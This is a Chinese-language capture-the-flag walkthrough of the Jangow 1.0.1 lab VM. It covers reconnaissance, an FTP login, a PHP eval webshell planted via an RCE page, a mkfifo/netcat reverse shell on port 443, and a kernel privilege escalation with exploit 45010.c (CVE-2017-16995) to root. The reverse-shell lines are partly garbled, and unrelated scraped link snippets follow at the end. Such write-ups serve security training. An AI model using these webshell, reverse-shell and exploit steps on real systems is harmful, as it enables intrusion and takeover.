真的学不了一点。。。
真的学不了一点。。。

红队打靶练习:JANGOW: 1.0.1

目录

信息收集

1、arp探测

2、netdiscover

3、nmap扫描

4、目录扫描

WEB

1、80端口

2、21端口

ssh登录

1、写入shell

2、反弹shell

提权

Get shell

信息收集

1、arp探测
┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:e6:0b:60       VMware, Inc.
192.168.16.129  00:0c:29:66:12:08       VMware, Inc.
192.168.16.254  00:50:56:e6:5c:c0       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.361 seconds (108.43 hosts/sec). 4 responded
2、netdiscover
netdiscover工具

 Currently scanning: 172.26.56.0/16   |   Screen View: Unique Hosts                                                                    
                                                                                                                                       
 37 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 2220                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.16.1    00:50:56:c0:00:08     33    1980  VMware, Inc.                                                                        
 192.168.16.2    00:50:56:e6:0b:60      2     120  VMware, Inc.                                                                        
 192.168.16.129  00:0c:29:66:12:08      1      60  VMware, Inc.                                                                        
 192.168.16.254  00:50:56:e6:5c:c0      1      60  VMware, Inc.
3、nmap扫描
端口扫描
└─# nmap -p- 192.168.16.129                       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 12:25 CST
Nmap scan report for 192.168.16.129
Host is up (0.00022s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:66:12:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.69 seconds



┌──(root㉿ru)-[~/lianxi]
└─# cat xx.nmap   
# Nmap 7.94 scan initiated Thu Oct 12 12:29:48 2023 as: nmap -sS -sC -sV -A -T4 -p 21,80 -oA /root/lianxi/xx 192.168.16.129
Nmap scan report for 192.168.16.129
Host is up (0.00019s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:66:12:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.16.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 12 12:30:04 2023 -- 1 IP address (1 host up) scanned in 15.33 seconds
4、目录扫描
dirb

┌──(root㉿ru)-[~/lianxi]
└─# dirb http://192.168.16.129:80 -w php,txt,html,js,sh 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct 12 13:55:01 2023
URL_BASE: http://192.168.16.129:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.16.129:80/ ----
+ http://192.168.16.129:80/server-status (CODE:403|SIZE:279)                                                                           
==> DIRECTORY: http://192.168.16.129:80/site/                                                                                          
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/ ----
==> DIRECTORY: http://192.168.16.129:80/site/assets/                                                                                   
==> DIRECTORY: http://192.168.16.129:80/site/css/                                                                                      
+ http://192.168.16.129:80/site/index.html (CODE:200|SIZE:10190)                                                                       
==> DIRECTORY: http://192.168.16.129:80/site/js/                                                                                       
==> DIRECTORY: http://192.168.16.129:80/site/wordpress/                                                                                
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
+ http://192.168.16.129:80/site/assets/favicon.ico (CODE:200|SIZE:23462)                                                               
==> DIRECTORY: http://192.168.16.129:80/site/assets/img/                                                                               
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/wordpress/ ----
+ http://192.168.16.129:80/site/wordpress/index.html (CODE:200|SIZE:10190)                                                             
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/assets/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                       
-----------------
END_TIME: Thu Oct 12 14:00:43 2023
DOWNLOADED: 32284 - FOUND: 4


dirsearch

┌──(root㉿ru)-[~]
└─# dirsearch -u http://192.168.16.129:80 -e*           

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/.dirsearch/reports/192.168.16.129-80/_23-10-12_13-55-02.txt

Error Log: /root/.dirsearch/logs/errors-23-10-12_13-55-02.log

Target: http://192.168.16.129:80/

[13:55:02] Starting: 
[13:55:03] 200 -  336B  - /.backup                                         
[13:55:03] 403 -  279B  - /.ht_wsr.txt                                     
[13:55:03] 403 -  279B  - /.htaccess.bak1
[13:55:04] 403 -  279B  - /.htaccess.sample
[13:55:04] 403 -  279B  - /.htaccess_orig
[13:55:04] 403 -  279B  - /.htaccess_extra
[13:55:04] 403 -  279B  - /.htaccess.orig
[13:55:04] 403 -  279B  - /.htaccess_sc
[13:55:04] 403 -  279B  - /.htaccessOLD
[13:55:04] 403 -  279B  - /.htaccess.save
[13:55:04] 403 -  279B  - /.htaccessBAK
[13:55:04] 403 -  279B  - /.htaccessOLD2
[13:55:04] 403 -  279B  - /.htm                                            
[13:55:04] 403 -  279B  - /.html
[13:55:04] 403 -  279B  - /.httr-oauth
[13:55:04] 403 -  279B  - /.htpasswds                                      
[13:55:04] 403 -  279B  - /.htpasswd_test
[13:55:04] 403 -  279B  - /.php3                                           
[13:55:04] 403 -  279B  - /.php
[13:55:34] 403 -  279B  - /server-status                                    
[13:55:34] 403 -  279B  - /server-status/                                   
[13:55:36] 301 -  315B  - /site  ->  http://192.168.16.129/site/            
[13:55:36] 200 -   10KB - /site/                                            
                                                                            
Task Completed 

gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.16.129:80 -x php,txt,html,js,sh -w directory-list-lowercase-2.3-medium.txt 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.129:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,js,sh
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/site                 (Status: 301) [Size: 315] [--> http://192.168.16.129/site/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
==============================================================

feroxbuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# feroxbuster -u http://192.168.16.129:80 -x php,txt,html,js,sh -w directory-list-lowercase-2.3-medium.txt


 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher                  ver: 2.10.0
───────────────────────────┬──────────────────────
   Target Url            │ http://192.168.16.129:80
   Threads               │ 50
   Wordlist              │ directory-list-lowercase-2.3-medium.txt
   Status Codes          │ All Status Codes!
   Timeout (secs)        │ 7
   User-Agent            │ feroxbuster/2.10.0
   Config File           │ /etc/feroxbuster/ferox-config.toml
   Extract Links         │ true
   Extensions            │ [php, txt, html, js, sh]
   HTTP methods          │ [GET]
   Recursion Depth       │ 4
───────────────────────────┴──────────────────────
   Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://192.168.16.129/site => http://192.168.16.129/site/
200      GET      106l      659w    26989c http://192.168.16.129/site/assets/img/demo-image-01.jpg
200      GET       54l      134w     1644c http://192.168.16.129/site/js/scripts.js
200      GET      492l     2733w   186437c http://192.168.16.129/site/assets/img/demo-image-02.jpg
200      GET        1l        0w        1c http://192.168.16.129/site/busque.php
200      GET      949l     4824w   385662c http://192.168.16.129/site/assets/img/bg-masthead.jpg
200      GET        8l       29w    28898c http://192.168.16.129/site/assets/favicon.ico
200      GET    11253l    21663w   207746c http://192.168.16.129/site/css/styles.css
200      GET      679l     4637w   425261c http://192.168.16.129/site/assets/img/ipad.png
200      GET      173l      663w    10190c http://192.168.16.129/site/index.html
200      GET     2608l    13994w   956051c http://192.168.16.129/site/assets/img/bg-signup.jpg
301      GET        9l       28w      322c http://192.168.16.129/site/assets => http://192.168.16.129/site/assets/
301      GET        9l       28w      319c http://192.168.16.129/site/css => http://192.168.16.129/site/css/
301      GET        9l       28w      325c http://192.168.16.129/site/wordpress => http://192.168.16.129/site/wordpress/
200      GET        1l        1w        2c http://192.168.16.129/site/123.php
200      GET      173l      663w    10190c http://192.168.16.129/site/wordpress/index.html
301      GET        9l       28w      318c http://192.168.16.129/site/js => http://192.168.16.129/site/js/
200      GET        1l       10w       87c http://192.168.16.129/site/wordpress/config.php
200      GET       44l      346w    26169c http://192.168.16.129/site/exp
[####################] - 5m   2491854/2491854 0s      found:19      errors:1      
[####################] - 0s   1245774/1245774 73280824/s http://192.168.16.129:80/ => Directory listing
[####################] - 5m   1245774/1245774 4008/s  http://192.168.16.129/site/ 
[####################] - 0s   1245774/1245774 4847370/s http://192.168.16.129/site/assets/ => Directory listing
[####################] - 0s   1245774/1245774 6591397/s http://192.168.16.129/site/js/ => Directory listing
[####################] - 1s   1245774/1245774 1338103/s http://192.168.16.129/site/assets/img/ => Directory listing
[####################] - 1s   1245774/1245774 1832021/s http://192.168.16.129/site/css/ => Directory listing
[####################] - 5m   1245774/1245774 3986/s  http://192.168.16.129/site/wordpress/

WEB

1、80端口

红队打靶练习:JANGOW: 1.0.1_第1张图片

红队打靶练习:JANGOW: 1.0.1_第2张图片

红队打靶练习:JANGOW: 1.0.1_第3张图片

2、21端口
┌──(root㉿ru)-[~/lianxi]
└─# ftp                                                                                                      
ftp> open 192.168.16.129
Connected to 192.168.16.129.
220 (vsFTPd 3.0.3)
Name (192.168.16.129:root): jangow01
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||17403|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Oct 31  2021 .
drwxr-xr-x   14 0        0            4096 Jun 10  2021 ..
drwxr-xr-x    3 0        0            4096 Oct 31  2021 html
226 Directory send OK.
ftp> pwd
Remote directory: /var/www
ftp> cd home
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||27583|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Jun 10  2021 jangow01
ftp> cd jangow01
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||12012|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Jun 10  2021 .
drwxr-xr-x    3 0        0            4096 Oct 31  2021 ..
-rw-------    1 1000     1000          200 Oct 31  2021 .bash_history
-rw-r--r--    1 1000     1000          220 Jun 10  2021 .bash_logout
-rw-r--r--    1 1000     1000         3771 Jun 10  2021 .bashrc
drwx------    2 1000     1000         4096 Jun 10  2021 .cache
drwxrwxr-x    2 1000     1000         4096 Jun 10  2021 .nano
-rw-r--r--    1 1000     1000          655 Jun 10  2021 .profile
-rw-r--r--    1 1000     1000            0 Jun 10  2021 .sudo_as_admin_successful
-rw-rw-r--    1 1000     1000           33 Jun 10  2021 user.txt
226 Directory send OK.
ftp> cat user.txt
?Invalid command.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||33573|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*******************************************************************************************|    33        5.12 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (4.60 KiB/s)
ftp> 
zsh: suspended  ftp
                                                                                                                                        
┌──(root㉿ru)-[~/lianxi]
└─# ls
port.gnmap  port.nmap  port.xml  user.txt  xx.gnmap  xx.nmap  xx.xml
                                                                                                                                        
┌──(root㉿ru)-[~/lianxi]
└─# cat user.txt
d41d8cd98f00b204e9800998ecf8427e        第一个flag

ssh登录

1、写入shell
利用存在RCE页面进行反弹shell
echo '' >shell.php

url编码
echo%20'%3C%3Fphp%20echo%20%22OK%EF%BC%81%22%3Beval(%24_POST%5Bcmd%5D)%3B%20%3F%3E'%20%3E987.php

连接蚁剑即可
2、反弹shell
在靶机目录(/etc/ssh/ssh_config)找到文件,文件开启了22端口,但是工具并没有扫到,说明可能被防火墙拦截了,做了限制,所以我们进行反弹shell要使用特制的shell脚本。

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   RhostsRSAAuthentication no
#   RSAAuthentication yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/identity
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Cipher 3des
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,[email protected],hmac-ripemd160
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

使用 mkfifo 命令创建命名管道反弹shell

语法
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc  1024 >/tmp/f

&1|nc 192.168.16.129 443 >/tmp/f");?>


┌──(root㉿ru)-[~/lianxi]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.16.129: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.129] 37342
/bin/sh: 0: can't access tty; job control turned off
$ whereis python
python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ pwd
pwd
/var/www/html/site
www-data@jangow01:/var/www/html/site$ uname -a
uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/var/www/html/site$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial
www-data@jangow01:/var/www/html/site$

提权

┌──(root㉿ru)-[~/lianxi]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.16.129: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.129] 37342
/bin/sh: 0: can't access tty; job control turned off
$ whereis python
python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ pwd
pwd
/var/www/html/site
www-data@jangow01:/var/www/html/site$ uname -a
uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/var/www/html/site$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial
www-data@jangow01:/var/www/html/site$ 

┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 4.4.0-31
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                  | linux/dos/43234.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Esca | windows_x86-64/local/47170.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                         | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escal | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                | linux/local/41760.txt
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                        
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 16.04.1              
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation              | linux/local/40489.txt
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                      
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 16.04   
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                    | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                       | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem'  | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                           | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack C | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                               | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read           | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                     | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                  | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation    | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escala | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Es | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation        | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation              | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                                          | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                       | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                              | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation   | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SME | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Esc | linux/local/47169.c
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                      
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 45010.c  
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /root/lianxi/45010.c

然后把poc扔进蚁剑,随后进行下一步操作

www-data@jangow01:/var/www/html/site$ ls
ls
45010.c  assets      css          index.html  wordpress
987.php  busque.php  ffshell.php  js
www-data@jangow01:/var/www/html/site$ gcc 45010.c -o exp   //编译
gcc 45010.c -o exp
www-data@jangow01:/var/www/html/site$ ls
ls
45010.c  assets      css  ffshell.php  js
987.php  busque.php  exp  index.html   wordpress
www-data@jangow01:/var/www/html/site$ chmod +x exp   赋权
chmod +x exp
www-data@jangow01:/var/www/html/site$ ./exp
./exp
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003a782d00
[*] Leaking sock struct from ffff880039ff7680
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039444900
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880039444900
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Get shell

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# pwd
pwd
/var/www/html/site
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                          
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                          
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                          
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                          
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                    
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                    
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                    
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                   
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                   
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                  
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                 
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                 
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                 
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                  
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                  
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                   
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                    
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                    
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                    
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                    
                       @  @@@@@@@@&               JANGOW               &@@@                          
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                          
                                     &&&@@@@&%       &/    (&&@@@&&&                                
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709  第二个flag

你可能感兴趣的:(红队渗透靶机,网络安全)

  • 感恩日志 圆施
    张新丽2019年8月16日感恩日志:1.感恩天地滋养万物;感恩国家恩惠护佑;感恩父母养育深恩。2.感恩尊重为平台源头付出的所有人事物。3.感恩红斌、孙萍清晨7点开车来接我和小姨去安宁渠采摘。4.感恩小姨和小姨夫亲自采摘还带我们去瓜地品尝,第一次这么吃好甜啊,忘掉了炎热消了暑,拍下了瞬间,分享着快乐,带给大家。4.感恩整理收拾好小姨给大家利用午休蒸苞米。5.感恩去接爸妈参加沙龙。6.感恩祝福两位伙伴
  • 入伏(五) 喜马ma
    图片发自App入伏13今天我看见很多蜻蜓在飞飞得很低想起小学时学的那点知识在这闷热的午后真能来一场暴雨太过瘾了入伏14有点像瓢虫的昆虫喜欢吃葡萄叶喜欢交配在炎热的夏天如果你在葡萄园看见两只昆虫它们不是在吃葡萄叶就是在交配请记住它们的名字叫葡萄十星红甲
  • ChatGPT一路狂飙? 何鲸洛
    2月2日。根据投行瑞银集团在周三发布的一份研究报告。爆红聊天机器人ChatGPT的月活跃用户在今年1月份预计达到了1亿,这距离它推出只有2个月时间,成为史上增长最快的消费者应用。①ChatGPT一路火花带闪电?▽2014年。OpenAI创始人SamAltman早年曾执掌著名的硅谷孵化器YCombinator。2015年。Altman联合马斯克、彼得·泰尔、AWS、印度Infosys和YC等作为出资
  • 网络安全(黑客)——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 黑客(网络安全)技术自学30天 一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • Everyday is Mayday | 祝五月天23th成团快乐 不在摇滚区
